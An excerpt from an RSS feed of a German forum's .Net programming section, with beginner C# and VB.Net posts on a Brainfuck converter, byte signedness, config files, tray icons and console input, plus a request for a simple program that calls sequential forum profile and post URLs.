/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"place++;\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">"&lt;"</span><span style="color: #007700">:<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"place--;\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">"+"</span><span style="color: #007700">:<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"arr&#91;place&#93;++;\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">"-"</span><span style="color: #007700">:<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"arr&#91;place&#93;--;\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">"."</span><span style="color: #007700">:<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"Console.Write((char)Convert.ToInt32(arr&#91;place&#93;));\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">","</span><span style="color: #007700">:<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"arr&#91;place&#93;&nbsp;=&nbsp;Convert.ToByte(Convert.ToInt32(Console.Read()));\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">"&#91;"</span><span style="color: #007700">:<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"while(arr&#91;place&#93;&nbsp;&gt;&nbsp;0)&nbsp;{\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">"&#93;"</span><span style="color: #007700">:<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"}\n"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"}\n}"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;</span><span style="color: #0000BB">strBuild</span><span style="color: #007700">.</span><span style="color: #0000BB">ToString</span><span style="color: #007700">();<br />}&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Wandelt <a href="http://de.wikipedia.org/wiki/Brainfuck" target="_blank" rel="nofollow">Brainfuck</a> in C# um, wer was damit anfangen kann :D</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Minecraft</dc:creator>
			<guid isPermaLink="true">net-94/brainfuck2c-converter-12561</guid>
		</item>
		<item>
			<title>Signed Byte / Unsigned</title>
			<link>net-94/signed-byte-unsigned-12424?goto=newpost</link>
			<pubDate>Fri, 18 May 2012 10:50:30 GMT</pubDate>
			<description>HeyHo, 
bezüglich eines Projektes, was ich zur Zeit angehe stoße ich auf folgendes Problem: 
Beim konvertieren von einem short zu einem byte-array...</description>
			<content:encoded><![CDATA[<div>HeyHo,<br />
bezüglich eines Projektes, was ich zur Zeit angehe stoße ich auf folgendes Problem:<br />
Beim konvertieren von einem short zu einem byte-array bekomme ich bei Java negative Zahlen, bei C# postitive, was unterm Strich dazu führt, dass der Server das Packet, was ich sende nicht richtig identifizieren kann. Beispiel:<br />
<br />
Java:<br />
        short id = 149;<br />
        byte[] sbytes = new byte[]{(byte)(id &gt;&gt; 8), (byte)id};<br />
        System.out.println(sbytes[0] + &quot;:&quot; + sbytes[1]);<br />
Ergebnis: 0:-107<br />
<br />
C#:<br />
            short id = 149;<br />
            byte[] sBytes = new byte[] { (byte)(id &gt;&gt; 8), (byte)id };<br />
            Console.WriteLine(sBytes[0] + &quot;:&quot; + sBytes[1]);<br />
            Console.ReadKey();<br />
Ergebnis: 0:149<br />
<br />
Ich brauche aber, wie bei Java den -107ner Wert :(<br />
Für Hilfe wäre ich dankbar.<br />
MfG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Mentos</dc:creator>
			<guid isPermaLink="true">net-94/signed-byte-unsigned-12424</guid>
		</item>
		<item>
			<title>VB.Net Suche jemanden der mir 2 Programme macht</title>
			<link>net-94/suche-jemanden-der-mir-2-programme-macht-12392?goto=newpost</link>
			<pubDate>Thu, 17 May 2012 14:33:28 GMT</pubDate>
			<description>Hi. Ich suche 2 Programme die mir jemand programmieren soll die aber das selbe Prinzip haben. 
 
 
Das eine Programm soll diesen Link aufrufen:...</description>
			<content:encoded><![CDATA[<div>Hi. Ich suche 2 Programme die mir jemand programmieren soll die aber das selbe Prinzip haben.<br />
<br />
<br />
Das eine Programm soll diesen Link aufrufen:<br />
ustunting.com/board/index.php?page=User&amp;userID=1900<br />
<br />
Danach immer am Ende die Zahl +1 erhöhen also so:<br />
ustunting.com/board/index.php?page=User&amp;userID=1901<br />
ustunting.com/board/index.php?page=User&amp;userID=1902<br />
ustunting.com/board/index.php?page=User&amp;userID=1903<br />
usw. also immer die ID um 1 erhöhen und das alle 2-3 Sekunden.<br />
<br />
Das zweite Programm soll diesen Link aufrufen:<br />
<a href="http://ustunting.com/board/index.php?page=Thread&amp;postID=25000" target="_blank" rel="nofollow">http://ustunting.com/board/index.php...d&amp;postID=25000</a><br />
<br />
Danach auch immer 2-3 Sekunden dann einen neuen Link aufrufen wo die ID +1 erhöht ist also:<br />
<br />
<a href="http://ustunting.com/board/index.php?page=Thread&amp;postID=25001" target="_blank" rel="nofollow">http://ustunting.com/board/index.php...d&amp;postID=25001</a><br />
<a href="http://ustunting.com/board/index.php?page=Thread&amp;postID=25002" target="_blank" rel="nofollow">http://ustunting.com/board/index.php...d&amp;postID=25002</a><br />
<br />
usw.<br />
<br />
SourceCode wäre auch gut.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/suche-jemanden-der-mir-2-programme-macht-12392</guid>
		</item>
		<item>
			<title>C# Einfaches Speichern und Laden einer Config in C#</title>
			<link>net-94/einfaches-speichern-laden-einer-config-in-c-31857?goto=newpost</link>
			<pubDate>Wed, 02 May 2012 21:19:32 GMT</pubDate>
			<description>Anhand eines Dictionarys wird eine Config geladen und gespeichert. 
 
 class Program 
    { 
        //Trennzeichen festlegen 
        private const...</description>
			<content:encoded><![CDATA[<div>Anhand eines Dictionarys wird eine Config geladen und gespeichert.<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
 class Program<br />
    {<br />
        //Trennzeichen festlegen<br />
        private const string _recordDelimiter = &quot;\r\n&quot;;<br />
        private const char _splitDelimiter = '=';<br />
        private const string _filePath = &quot;settings.conf&quot;;<br />
<br />
        static void Main(string&#91;&#93; args)<br />
        {<br />
            //Prüfen ob Settings-Datei existiert<br />
            if (File.Exists(_filePath))<br />
            {<br />
                //Dictionary erstellen (einfacher Abruf der Werte über den Schlüssel + Keine doppelten Schlüssel mögl.)<br />
                Dictionary&lt;string, string&gt; Settings = new Dictionary&lt;string, string&gt;();<br />
<br />
                //Datei einlesen und in Dictionary eintragen<br />
                foreach (string s in File.ReadAllLines(_filePath))<br />
                    //Nur eintragen wenn Key nicht schon eingetragen wurde und der Splitdelimiter in der Zeile vorhanden ist<br />
                    if (s.Contains(_splitDelimiter))<br />
                        if (!Settings.ContainsKey(s.Split(_splitDelimiter)&#91;0&#93;))<br />
                            Settings.Add(s.Split(_splitDelimiter)&#91;0&#93;, s.Split(_splitDelimiter)&#91;1&#93;);<br />
                        else<br />
                            //Ansonsten zb. den Wert für den Key nur aktualisieren<br />
                            Settings&#91;s.Split(_splitDelimiter)&#91;0&#93;&#93; = s.Split(_splitDelimiter)&#91;1&#93;;<br />
<br />
                //Wert ausgeben oder benutzen<br />
                Console.WriteLine(&quot;Username = &quot; + Settings&#91;&quot;Username&quot;&#93;);<br />
<br />
                /* 1337 LinQ zum Joinen des Dictionarys benutzen<br />
                 * Erklärung:<br />
                 * Ihr Joint zuerst die Schlüssel mit den Werten anhand des splitDelimiters (hier '='), <br />
                 * dann werden alle Datensätze mit dem recordDelimiter gejoined (hier ein Zeilenumbruch im Windowsformat)<br />
                 * Mit dem LinQ 'Select' wählt ihr die Keys und Values aus und im 1. Select werden diese Formatiert<br />
                */<br />
                string saveString = string.Join(_recordDelimiter, Settings.Select(k =&gt; k.Key + _splitDelimiter + string.Join(string.Empty, k.Value.Select(v =&gt; v))));<br />
<br />
                //Das Ganze in einer Datei abspeichern<br />
                File.WriteAllText(_filePath, saveString);<br />
            }<br />
            Console.ReadLine();<br />
        }<br />
    }
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sky.NET</dc:creator>
			<guid isPermaLink="true">net-94/einfaches-speichern-laden-einer-config-in-c-31857</guid>
		</item>
		<item>
			<title>C# Frage</title>
			<link>net-94/frage-11687?goto=newpost</link>
			<pubDate>Tue, 01 May 2012 16:43:21 GMT</pubDate>
			<description>Heeey, ich brauche kurz eure Hilfe und zwar: Viele von euch kennen wsl ja dieses Popup-Fenster, wenn zB die Virendatenbank von irgendeinem...</description>
			<content:encoded><![CDATA[<div>Heeey, ich brauche kurz eure Hilfe und zwar: Viele von euch kennen wsl ja dieses Popup-Fenster, wenn zB die Virendatenbank von irgendeinem AntiVir-Programm aktualisiert wird, welches reechts unten von unten nach oben angezeigt wird oder?<br />
<br />
Ich moechte halt, dass wenn ein Ereignis eintritt, dass so ein PopUp -Fenster erscheint und dann halt irgendwelche informationen ueber das Ereignis anzeigt..Und ich hab halt gar keinen Plan, wie ich das realisieren soll. Eventuell mit einer zweiten Form?<br />
<br />
Ich hoffe ihr wisst, was ich meine. :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Saad</dc:creator>
			<guid isPermaLink="true">net-94/frage-11687</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net Doppelte Eingabe vermeiden [Console]]]></title>
			<link>net-94/doppelte-eingabe-vermeiden-console-11673?goto=newpost</link>
			<pubDate>Tue, 01 May 2012 12:13:46 GMT</pubDate>
			<description>Hey :) 
Ich habe mich mal an etwas leichtem in VB versucht  
Das hat aber ein bisschen gefailt seht selbst : 
Bild: http://i47.tinypic.com/5efzug.png...</description>
			<content:encoded><![CDATA[<div><span style="font-family: Comic Sans MS"><font size="4">Hey :)</font><br />
Ich habe mich mal an etwas leichtem in VB versucht <br />
Das hat aber ein bisschen gefailt seht selbst :<br />
<a style="font-weight:bold;text-decoration:none;" target="blank" href="http://i47.tinypic.com/5efzug.png"><img  style="vertical-align:text-bottom;" src="https://u-img.net/img/2542Da.png"> BILD ANZEIGEN </a> <a style="font-size:10px;text-decoration:none;" href="http://u-hacks.net/news-und-ankuendigungen-4/erlaubte-imagehoster-17046/" target="blank"> [Warum wird das Bild nicht angezeigt?]</a><br />
Weiß jemand Wieso das so ist ,  dass ich 2x 6 eingeben muss , damit die Console mir antwortet ?<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp; &nbsp; &nbsp; &nbsp; Dim ERGEBNIS As Byte = Console.ReadLine<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; If ERGEBNIS = &quot;6&quot; Then<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;Super &quot; &amp; ERGEBNIS &amp; &quot; ist Richtig!&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.ReadLine()</code><hr />
</div>[/QUOTE]</span></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Impact</dc:creator>
			<guid isPermaLink="true">net-94/doppelte-eingabe-vermeiden-console-11673</guid>
		</item>
		<item>
			<title>C# Trayfunktion</title>
			<link>net-94/trayfunktion-11635?goto=newpost</link>
			<pubDate>Mon, 30 Apr 2012 10:15:42 GMT</pubDate>
			<description>Hey ich hab da ein Problem und zwar: 
Ich hab halt ein Programm und möchte, dass wenn man auf den Miniermungsbutton da klickt, dass die Anwendung...</description>
			<content:encoded><![CDATA[<div>Hey ich hab da ein Problem und zwar:<br />
Ich hab halt ein Programm und möchte, dass wenn man auf den Miniermungsbutton da klickt, dass die Anwendung nicht mehr in der Tasleiste angezeigt wird, sondern im Tray.<br />
<br />
Dazu habe ich halt folgenden Codeschnipsel gefunden:<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;</span><span style="color: #007700">private&nbsp;</span><span style="color: #0000BB">void&nbsp;notifyIcon1_Click_1</span><span style="color: #007700">(</span><span style="color: #0000BB">object&nbsp;sender</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">EventArgs&nbsp;e</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">ShowInTaskbar&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">notifyIcon1</span><span style="color: #007700">.</span><span style="color: #0000BB">Visible&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">WindowState&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">FormWindowState</span><span style="color: #007700">.</span><span style="color: #0000BB">Normal</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;private&nbsp;</span><span style="color: #0000BB">void&nbsp;Form1_Resize</span><span style="color: #007700">(</span><span style="color: #0000BB">object&nbsp;sender</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">EventArgs&nbsp;e</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">WindowState&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #0000BB">FormWindowState</span><span style="color: #007700">.</span><span style="color: #0000BB">Minimized</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">ShowInTaskbar&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">WindowState&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">FormWindowState</span><span style="color: #007700">.</span><span style="color: #0000BB">Minimized</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">notifyIcon1</span><span style="color: #007700">.</span><span style="color: #0000BB">Visible&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Wenn ich nun, die Form minimiere, bleibt die Anwedung noch immer in der Taskleiste und das Trayicon wird gleich angezeigt, wenn ich die anwedung starte.<br />
<br />
Ich will aber, dass das Trayicon erst dann angezeigt wird, wenn man die Form minimiert und die Anwendung soll dann nicht mehr in der Taskleiste angezeigt werden.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Saad</dc:creator>
			<guid isPermaLink="true">net-94/trayfunktion-11635</guid>
		</item>
		<item>
			<title>VB.Net Frage GhostRadiobutton1</title>
			<link>net-94/frage-ghostradiobutton1-11570?goto=newpost</link>
			<pubDate>Sat, 28 Apr 2012 19:07:02 GMT</pubDate>
			<description>Hallo leutz, 
 
Ich wollte gerade eben einen neuen Player basteln und nun weiß ich nicht was ich einfügen soll. 
 
Ich habe probiert        ...</description>
			<content:encoded><![CDATA[<div>Hallo leutz,<br />
<br />
Ich wollte gerade eben einen neuen Player basteln und nun weiß ich nicht was ich einfügen soll.<br />
<br />
Ich habe probiert         AxWindowsMediaPlayer1.URL = (&quot;STREAM&quot;) einzufügen aber ging nicht.<br />
<br />
CODE<br />
   <div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
